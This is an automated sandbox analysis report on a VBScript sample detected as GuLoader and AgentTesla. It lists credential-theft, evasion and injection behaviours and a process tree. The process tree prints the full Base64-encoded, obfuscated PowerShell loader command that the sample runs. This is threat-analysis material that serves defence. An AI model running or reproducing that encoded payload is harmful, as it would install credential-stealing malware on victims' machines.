Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PUMP mt310143121.vbs

Overview

General Information

Sample Name:PUMP mt310143121.vbs
Analysis ID:715071
MD5:41ad96654d44ef375097eeeb83818cf7
SHA1:20dae7bc9d6dc2c5f947de3f871d617fb36e6edc
SHA256:28bf271ec1576c0e7d1b2a243de952bb70c25711cdc9c2d4494002a3e2f346ca
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Yara detected GuLoader
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Compiles code for process injection (via .Net compiler)
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 8888 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PUMP mt310143121.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 9092 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATABpAE0ARABvAG8ATQBlAGQARQBuAHUARgB1AGwATABpAGUATgBvAEgAdQBuAGEAVgByAG4ASwBhAGQASABlAGwAVgBlAGUAUgBlACgATwBwAGkAawBsAG4ASwBiAHQAVQBuACAARABhAEQAVABlAGkAVgByAHMAVABhADQAUwB0ADAAYwBlACkAUQB1ADsACgBFAGsAWwBhAG4ARABBAGYAbABMAG8AbABVAG4ASQBIAGwAbQBFAGYAcABVAG4AbwBQAHUAcgBZAG4AdABUAGkAKABCAGEAIgBHAGEAdQBCAGwAcwBWAGUAZQBEAG8AcgBVAGQAMwBBAHIAMgBTAG8AIgBEAGEAKQBHAHIAXQBCAGUAcABCAG8AdQBTAGsAYgBOAGUAbABVAHIAaQBPAHUAYwBSAGEAIABKAHUAcwBhAG0AdABCAHIAYQBGAGEAdABTAGMAaQBGAGkAYwBBAGcAIABJAHQAZQBNAGEAeABNAG8AdABSAGUAZQBEAGUAcgBnAG4AbgBVAGQAIABDAGwAaQBCAHIAbgBBAGQAdABLAHUAIABCAHIASQBQAGEAcwBVAG4ARABIAGEAbABBAHMAZwBsAGEAQgBWAGcAdQBmAGEAdABBAGIAdABQAHMAbwBUAHIAbgBEAGUAQwBvAHYAaABFAHIAZQBTAHQAYwBGAGEAawBCAGkAZQBEAGUAZABUAGkAKABGAG8AaQBFAG0AbgBBAGwAdABCAGUAIABQAGEATABUAGkAeQBOAG8AcwBTAGEAawBQAGkAdQBzAHQALABGAG8AaQBnAHIAbgBVAGQAdABmAHUAIABBAG4AUwBJAG0AaQBQAG8AbgBBAGYAaQBUAGoAcwBEAGkAOQBGAGUANABBAHAAKQBhAGYAOwAKAFMAcABbAEYAbABEAFQAaQBsAHMAYQBsAFMAaQBJAFMAcABtAEIAcgBwAEwAZwBvAEUAawByAFAAcgB0AE8AdgAoAFUAbAAiAFUAbgBBAEEAbgBEAEsAdQBWAFAAbABBAEIAaQBQAEgAeQBJAEMAbwAzAEMAYQAyAFAAYQAuAFIAaQBEAEQAaQBMAFIAZQBMAGQAYQAiAFMAcAApAFAAcgBdAFMAdQBwAFQAbwB1AG4AaQBiAFIAaQBsAEQAaQBpAFYAaQBjAFMAdAAgAGIAbwBzAEQAYQB0AEcAYQBhAGYAcgB0AEUAbgBpAEgAeQBjAFUAbgAgAFAAdQBlAHMAbAB4AE4AbwB0AFMAYwBlAFIAZQByAFMAZQBuAGcAcgAgAEMAaABpAHMAYwBuAE8AcAB0AFAAZQAgAEMAaABEAEgAeQBlAE0AaQBsAE4AaQBlAE0AeQB0AE4AbwBlAEQAZQBTAEkAbABlAFYAZQByAEcAaQB2AFIAYQBpAEQAdQBjAFMAYwBlAEsAcgAoAHgAYQBpAEYAbwBuAFQAYQB0AE4AaQAgAEcAZQBBAFMAYwByAEQAbwBjAEsAYQApAGwAZQA7AAoAUwBwAFsARQBtAEQARwBsAGwAUgBpAGwAUwB0AEkARABlAG0AVABlAHAASABvAG8AQQBtAHIARABlAHQARQBpACgAQwBhACIAUwB0AHUASQBuAHMARgByAGUAQwBlAHIAQQByADMAUwBhADIAUABpACIATQBvACkAQwBoAF0AVgByAHAARgByAHUATQBhAGIARgBvAGwASABhAGkARQB4AGMARgBhACAAVQBkAHMAQQByAHQAUgBpAGEATQBhAHQAVABoAGkASQBtAGMASABlACAAUABzAGUASwBvAHgAVAByAHQAQgBsAGUATgBvAHIAVQBwAG4AVQBiACAAZwBuAGkAQwB1AG4AQwBlAHQAUABvACAAUABlAEMATgBvAHIAdwBoAGUARgBlAGEASABvAHQAUAByAGUAUAByAEMAcABpAGEAUwB1AHIAUwBuAGUASQByAHQAZABlACgAQgBvAGkARABpAG4ATwBsAHQAQwBlACAAQQBuAFAARwB1AG8AVABhAGsARwBsAGkAQgBvAGUAcwBlACwAbQBhAGkASwBhAG4ATgBkAHQAVQBlACAAUwB1AFMAQwBvAHUARQBzAHAARABpACwAUwB0AGkATgBvAG4ASQBuAHQAVwBlACAAVQBuAEIAcwBsAGkAVABpAG8AQgBqAHYAUwB1AGEAUgB1ADEAUAB5ADMARABpADcAUwBvACwAUwBrAGkAUwBwAG4AVQBkAHQAUABlACAAVQBkAEkAVgBhAGsATQBvAGEARwByAHMAUwBrAHQASAByAGwAUwBvACkAcgBhADsACgBBAHAAWwBTAHUARABTAHQAbABQAGUAbABHAGUASQBUAGgAbQBQAG8AcABTAHAAbwBUAGkAcgBTAHQAdABRAGEAKABTAGMAIgBOAGUAawBTAGkAZQBCAGkAcgBLAGwAbgBPAHIAZQBSAGUAbABTAGwAMwBTAG8AMgBVAGwAIgBWAGkAKQBtAHUAXQBBAGcAcABFAG4AdQB0AGUAYgBBAHQAbABDAG8AaQBDAHkAYwBTAGgAIABPAHAAcwBFAGYAdABMAHUAYQBPAHYAdABDAG8AaQBNAGEAYwBBAGYAIABJAGQAZQBCAGUAeAByAGUAdABGAG8AZQBUAGUAcgBTAGsAbgBEAGkAIABMAG8AdgBkAGEAbwBXAGgAaQBJAG4AZABUAGUAIABGAHIAUgBTAGEAdAB0AGEAbABUAHUATQBDAG8AbwBaAGUAdgBIAHIAZQBMAGkATQB2AGEAZQBBAG4AbQBNAHUAbwBDAGEAcgBBAHIAeQBSAGgAKABUAHIASQBQAHIAbgBNAGkAdABMAGoAUABZAG4AdABDAGEAcgBhAHIAIABSAGEAdQBJAHMAdgBTAGUAbwBMAGcAcgBIAHkAMQBEAGEALABQAGUAcgBBAGYAZQBGAGwAZgBWAGkAIABNAGEASQBMAGwAbgBLAGUAdABVAGwAMwBzAG8AMgBTAGEAIABGAGkAdQBCAGUAdgBNAHUAbwBLAGEAcgBDAHIAMgBUAGkALABCAGkAaQBJAG4AbgBKAGUAdABNAGkAIABKAGEAdQBDAG8AdgBQAHIAbwBUAGkAcgBEAGkAMwBCAGUAKQBMAGkAOwAKAFAAcgBbAEgAagBEAFAAaQBsAGUAbQBsAEEAbgBJAEgAagBtAFMAYQBwAFYAYQBvAGYAcgByAEYAbwB0AFUAbgAoAEEAdQAiAEcAZQB1AFIAZQBzAFMAaQBlAEEAYQByAFMAeQAzAEIAcgAyAEcAYQAiAFIAYQApAE8AcgBdAE4AbwBwAEUAcgB1AEEAZwBiAGkAbgBsAFMAYwBpAFMAdABjAFUAdAAgAGwAZQBzAFQAbwB0AEEAbgBhAEUAcgB0AFMAawBpAGkAbgBjAGMAYQAgAEQAaQBlAEQAcgB4AFAAcgB0AHMAbgBlAFMAdQByAEgAeQBuAEIAZQAgAFIAZQBpAFMAdQBuAEEAbQB0AFUAZAAgAEgAeQBHAEEAZgBlAEQAZQB0AEMAYQBGAEMAZQBvAFUAbgBjAEUAeAB1AEQAdQBzAFIAZQAoAFUAZAApAFMAYQA7AAoATQBhAFsARABlAEQAQwBvAGwATwBwAGwATwBjAEkARgBvAG0AaQBkAHAAVwBvAG8AUABsAHIASABlAHQAWQBuACgAQwBhACIASQBtAHUAYgByAHMAUgBpAGUAVABoAHIAUABsADMATQBvADIATABpACIAbwBwACwAQgByACAAUwBvAEUAVgBpAG4ARQBuAHQAZABlAHIAVABlAHkARgBlAFAAVgBpAG8ASwBvAGkAQgBhAG4AQQBzAHQAUwB0AD0AUwBsACIARABlAEUAUAByAG4AUgBpAHUAVABlAG0AcwBhAFcAUABlAGkAQgBvAG4ATQBhAGQAQQBuAG8AUwBlAHcAUABhAHMARgBpACIARABhACkARQBzAF0ATQBlAHAASQBvAHUARQBrAGIAVQBkAGwAUwB0AGkAdABpAGMAQwBjACAAUwBlAHMAQwBuAHQAQQBuAGEAVABoAHQARABiAGkAUgBlAGMAUwBrACAASgBlAGUASwBpAHgAQwB5AHQATwBtAGUAUgB1AHIAawBvAG4ASgBkACAAUwBlAEkATABhAG4AVAB5AHQASABpAFAAUwBwAHQARwByAHIAVABoACAAUwBsAFYAUwBrAGkAQgBhAHQATABuAHIAcwBtAHUAQQB3AHMAQQByAGEAUgBlADMASABlADIATgBuACgAUgB1AHUAUABpAGkARQB4AG4AUwB2AHQATABlACAAbABpAHUAVABpAHYAUgBlAG8ATgBlAHIASQBuADUAUwB1ACwASgBhAGkAUwB0AG4ARgBpAHQAUwBpACAAUwBrAHUAQgBlAHYAQQBmAG8ASABhAHIARwBsADYAVABvACkAUwBhADsACgBDAGkAWwBEAGEARABVAHAAbABQAG8AbABVAG4ASQBLAHIAbQBHAHIAcABoAG8AbwBTAHkAcgBJAG4AdABTAGUAKABTAG8AIgBOAHMAawBkAGUAZQBTAHMAcgBSAGkAbgBDAG8AZQBQAHIAbABDAHIAMwB1AGwAMgBFAHgAIgBUAHIAKQBTAGsAXQBuAGUAcABCAGUAdQBQAGUAYgBJAG0AbABOAGkAaQBSAGkAYwBDAGEAIABCAHUAcwBSAGUAdABOAGUAYQBJAG4AdABGAG8AaQBJAG4AYwBjAG8AIABMAG8AZQBIAGkAeABJAGQAdABGAGkAZQBVAG4AcgBCAGUAbgBTAGsAIABTAG8AaQBUAGEAbgBTAGEAdABJAG4AIABQAHIAUwBUAGEAZQBUAG8AdABQAHIAVABEAGEAaABTAHkAcgBEAHYAZQBVAGgAYQBjAG8AZABCAHIAQwBEAGkAbwBQAG8AbgBBAGYAdABOAGUAZQBEAGUAeABBAGwAdABSAGUAKABIAG8AaQBSAGEAbgBPAHIAdABGAHUAIABwAGUATgBEAGEAZQBTAHQAZABTAHUAZgBUAHIAbwBGAG8AdABTAHQALABQAHIAaQBLAHUAbgBVAG4AdABUAGUAIABXAGEATgBTAGsAbwBTAHYAbgBVAGQAZwBGAHIAKQBKAGUAOwAKAEcAdQBbAEIAZQBEAEYAeQBsAFAAbwBsAHMAZQBJAFAAcgBtAFMAaABwAEIAcgBvAEMAcgByAEMAbwB0AEIAdQAoAEMAbwAiAFAAZQBrAEgAaQBlAE0AZQByAEcAdQBuAEYAYQBlAEEAdQBsAEIAYQAzAFMAaAAyAFQAYQAiAEYAbAAsAEIAcgAgAE0AeQBFAEsAaQBuAFMAcAB0AEcAeQByAFIAZQB5AE8AZABQAFAAcgBvAEUAbgBpAEUAZgBuAEwAYQB0AFUAawA9AFIAZQAiAFMAeQAkAFAAZQB1AEEAbAB2AEMAaABvAFUAZAByAHMAawA5AEQAbwAiAEMAbwApAFMAZQBdAFQAYQBwAE0AYQB1AEMAbwBiAEMAaABsAE8AdgBpAEYAeQBjAE0AYQAgAGkAbgBzAE0AZQB0AFMAaQBhAFIAZQB0AEQAZQBpAG0AZQBjAEcAcgAgAGQAeQBlAFUAbgB4AEwAdQB0AG8AdQBlAFMAcQByAEsAYQBuAEUAcwAgAE4AYQBpAEYAbABuAEEAbgB0AFQAaQAgAE8AdQBUAFAAYQBFAFAAZQBMAE0AbwBPAFQAaQAoAFMAYwBpAEsAawBuAEkAbgB0AE8AcAAgAFQAYQBDAFUAZABsAFUAdgBhAEYAbwBkAFMAdgBvAEIAZQBnAFIAYQBlAFMAaQBuAEMAbwBlAEcAZQB0AEgAYQA2AHMAcgAsAEYAaQAgAE8AcABpAFcAYQBuAFYAYQB0AEUAeAAgAE0AYQBEAFAAcgB5AEIAZQBuAEQAZQBlAEIAbwAsAFMAbwBpAEkAbgBuAEYAbAB0AFoAeQAgAFQAZQB1AEQAYQB2AFMAYQBvAEEAcgByAHMAawAsAEsAbAAgAFIAZQBpAEQAcgBuAFQAcgB0AEYAZQAgAEYAbgBDAE4AbwBsAEIAZQBhAFIAZQBkAEIAYQBvAEcAbwBnAFMAdQBlAEYAbwBuAFMAdABlAFIAZQB0AEkAbgApAFMAYQA7AAoATABpAH0ACgBEAG8AIgBMAHIAQAAKAEcAcgAkAEkAbgBDAEYAaQBsAE4AdQBhAEgAZQBkAEsAZQBvAEQAZQBnAEwAYQBlAEoAdQBuAE0AbwBlAFIAZQB0AEIAbwAzAGQAbwA9AFIAbwBbAFMAdABDAHMAYQBsAEwAZQBhAFMAdABkAEIAZQBvAFYAZQBnAFIAYQBlAFkAbwBuAFMAbwBlAEIAcgB0AFUAZAAxAEoAYQBdAFkAbwA6AEYAbAA6AFIAaABUAEEAbABFAEYAbwBMAEYAbwBPAEcAcgAoAEwAaQAwAE0AYQAsAFMAZQAxAFAAZQAwAE0AYQA0AFMAdQA4AFQAcgA1AFMAbwA3AE0AbwA2AEEAZQAsAFQAdQAxAFMAcAAyAFIAdQAyAEEAYwA4AEkAbgA4AEUAcAAsAEcAdQA2AEgAYQA0AEwAbwApAAoAaQBuACQAUwBrAEsAUwBrAHYAUwB0AGEAUwBlAHIARQBkAHQASwBvAGEAUwBhAGwARABvAHMARgBvAHYARgBvAD0AVABhACgASwBsAEcAUABhAGUAQgByAHQAQQBtAC0ATQBhAEkARQBuAHQARgBsAGUATABkAG0AVABhAFAARgBvAHIAcABlAG8AQgBsAHAARABvAGUAVQBuAHIARABhAHQASgB1AHkARABpACAAUgBvAC0AUwB5AFAAVABpAGEAUwB1AHQATgByAGgAVQBkACAAVgBhACIAQQByAEgAVgBhAEsASABqAEMAUABvAFUAQwBhADoAQQBmAFwASwByAFMAVABlAG8ASQBuAGYARgBvAHQARgB1AHcARQBsAGEAVgBpAHIASABvAGUAUwBsAFwAVwBvAGQATgBvAHIAYwBhAG0ARgBsAG0ATwB2AGUASwB2AHIAUwBoACIAUABlACkARAB1AC4AVABlAHMASQBtAGsAQgBhAG8AVQB1AGwAVAByAGUACgBGAG8AJABVAGQASQBPAG4AbgBHAHUAdABUAG8AZQBFAHgAcgBDAGEAcABDAGUAbABUAGEAIABEAHIAPQBTAHkAIABDAG8AWwB1AG4AUwBFAHYAeQBSAGUAcwBTAHQAdABTAGwAZQBCAHIAbQBTAGEALgBVAGQAQgBEAHUAeQBDAGUAdABCAHUAZQBzAGsAWwBOAGUAXQBPAG0AXQBDAG8AOgBPAHYAOgBGAHkAQwBSAGUAcgBSAGUAZQBNAG8AYQBOAGEAdABTAGsAZQBUAGUASQBTAHAAbgBLAGEAcwBTAHkAdABCAGoAYQBQAHIAbgBEAGUAYwBUAHIAZQBlAHUAKABFAHgAWwBPAHAAUwBGAG8AeQBBAGMAcwBBAGYAdABCAGkAZQBrAG8AbQBQAGEALgBOAGUAQgBBAGMAeQBhAGwAdABUAHIAZQBTAGkAXQBCAGwALABTAHAAJABGAGUASwBTAGwAdgBOAGEAYQBXAGEAcgBQAGEAdABDAG8AYQBSAGUAbABSAGUAcwBGAG8AdgBiAGkALgBIAHkATABTAGUAZQBPAHYAbgBSAGUAZwBGAG8AdABCAG8AaABNAGkAIABTAHQALwBSAGUAIABTAG0AMgBSAGEAKQAKAEMAaQBGAFMAagBvAE8AdQByAEUAcAAoAEYAbwAkAEEAZwBpAEUAcwA9AEkAbgAwAGYAcgA7AEIAZQAgAHQAZQAkAFMAZQBpAFMAaQAgAFUAcgAtAEwAYQBsAFQAbwB0AFMAYQAgAEMAbwAkAFMAYQBLAEEAbgB2AE4AeQBhAFAAcgByAEkAcwB0AEYAcgBhAEIAcgBsAFYAYQBzAEgAdQB2AEgAZQAuAE8AbABMAFUAbgBlAEMAbABuAEYAZQBnAEMAbwB0AFAAYQBoAFQAYQA7AFMAbwAgAEUAbgAkAE0AYQBpAEEAdQArAEsAdQA9AEkAbgAyAEQAZQApAAoAUwBuAHsACgBPAHYACQBVAGQAJABMAGUASQBOAG8AbgBTAGwAdABIAGkAZQBTAGEAcgBIAHkAcABUAHUAbABBAGwAWwBBAG4AJABxAHUAaQBLAHYALwBuAHUAMgBGAGkAXQBBAHIAIABWAG8APQBGAG8AIABGAGkAWwBDAGUAYwBJAG4AbwBFAG0AbgBiAGEAdgBWAGEAZQBTAHQAcgBTAHIAdABPAGwAXQBLAG4AOgBPAHAAOgBTAGkAVABGAGkAbwBEAGUAQgBSAGEAeQBLAG8AdABUAHYAZQBZAGEAKABsAGEAJABNAGEASwBWAG8AdgBNAGEAYQBMAGEAcgBVAG4AdABEAGUAYQBNAGUAbABCAGEAcwBSAGUAdgBEAHIALgBHAGEAUwBWAGEAdQBEAGkAYgBNAGUAcwBXAGUAdABVAHAAcgBEAGkAaQBIAHMAbgBTAHQAZwBUAGUAKABEAHkAJABNAGEAaQBFAHMALABSAGUAIABBAHIAMgBJAG4AKQBzAHQALABCAGUAIABJAG4AMQBQAGkANgBTAGEAKQAKAEYAbwB9AAoAQQB1AGYATwB2AG8ATAB1AHIASgBlACgAVAB5ACQAUwB2AFMAUgBoAHYAawBvAGUAVgByAGoATgB5AHMAYwBoAGUARwBvAG0ASwByAGUATwBwAD0AZABhADAARgBpADsATABpACAAVABhACQAUgBlAFMAQgBsAHYAUgB1AGUAVQBkAGoAVQBkAHMASQBuAGUATgBhAG0AQQBjAGUATQBhACAASwBvAC0AQQBzAGwAUwBhAHQAcwB1ACAASAB5ACQAdQBuAEkAVQBuAG4ASABrAHQAcwBlAGUARgBvAHIARwBhAHAAVQBuAGwARgBpAC4AQQB1AGMASAB5AG8AUwBhAHUAUAByAG4ARgByAHQAUwBtACAAVABqADsAUgBlACAASwByACQASwBsAFMATwBsAHYAWgBpAGUAUwBrAGoAUgB1AHMAVgBlAGUATgB5AG0ATABpAGUASwBhACsARABpACsAUwBuACkACgBTAGUAewAKAEIAaQAJAEgAZQBbAFQAaQBDAFcAaABsAFMAZQBhAFMAdABkAEMAaABvAFMAawBnAEwAaQBlAGYAbwBuAEEAcgBlAEMAbwB0AEEAYgAxAEIAbABdAEUAZgA6AFQAcgA6AFAAaQBSAFQAagB0AHAAaABsAFUAbABNAEQAYQBvAE8AdQB2AEQAeQBlAFUAbgBNAEUAbgBlAEEAZABtAEQAaQBvAEwAbwByAFUAbgB5AGcAaQAoAFcAYQAkAFMAdQBDAEYAZQBsAEwAbwBhAEEAZABkAEgAeQBvAE8AdQBnAEcAcgBlAFAAbABuAEMAaABlAFUAbgB0AEEAcgAzAFIAZQArAFMAYwAkAFUAbgBTAFkAdQB2AFUAbgBlAE4AaQBqAEMAbwBzAGEAcgBlAEgAcgBtAHMAbwBlAE0AZQAsAGYAcgBbAEkAZAByAFUAbgBlAEQAdQBmAFAAbABdAEMAbAAkAEQAZQBJAFMAeQBuAEcAcgB0AEQAZQBlAGIAZQByAFUAbgBwAEkAbQBsAHYAaQBbAEcAZQAkAFQAZQBTAEYAaQB2AEQAaQBlAEIAYQBqAE0AbwBzAFIAZQBlAEwAaQBtAE8AdQBlAFAAdQBdAFUAbgAsAFQAdgAxAFMAdQApAAoATwBtAH0ACgBMAGkAWwBQAGUAQwBLAGEAbABTAGwAYQBiAG8AZABVAG4AbwBGAGEAZwBFAGwAZQBhAGcAbgBDAGEAZQBXAGkAdABNAHUAMQB0AHUAXQBCAG8AOgBNAG8AOgBLAHIAVgBQAHIAaQBQAHIAdABIAGUAcgBPAHIAdQBSAGEAcwBVAG4AYQBTAHQAMwBTAGEAMgBOAGUAKABUAHIAJABUAGkAQwBWAGkAbABwAGEAYQBJAG4AZABDAHkAbwBTAGwAZwBJAG0AZQBOAG8AbgBTAGEAZQBHAGwAdABTAHQAMwBEAGkALABBAGEAIABWAGkAMABGAG8AKQBMAG8AIwAKACcAQAANAAoADQAKAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0AMgA7ACAAJABpACAALQBsAHQAIAAkAE0AaQBsAGoAdgByAG4AZQB0AGwALgBMAGUAbgBnAHQAaAAtADEAOwAgACQAaQArAD0AKAAyACsAMQApACkADQAKAHsADQAKAAkADQAKAAkAJAB1AHYAbwByACAAPQAgACQAdQB2AG8AcgAgACsAIAAkAE0AaQBsAGoAdgByAG4AZQB0AGwALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABNAGkAbABqAHYAcgBuAGUAdABsAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAHUAdgBvAHIAIAA9ACAAJAB1AHYAbwByACAAKwAgACIAYABuACIADQAKAAkACQAkAGkAIAA9ACAAJABpACAAKwAgADEADQAKAAkAfQAgAAkADQAKAAkACQANAAoACQANAAoAfQANAAoADQAKAA0ACgBJAEUAWAAgACQAdQB2AG8AcgANAAoA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 9100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 4664 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 6776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 6376 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • CasPol.exe (PID: 6564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

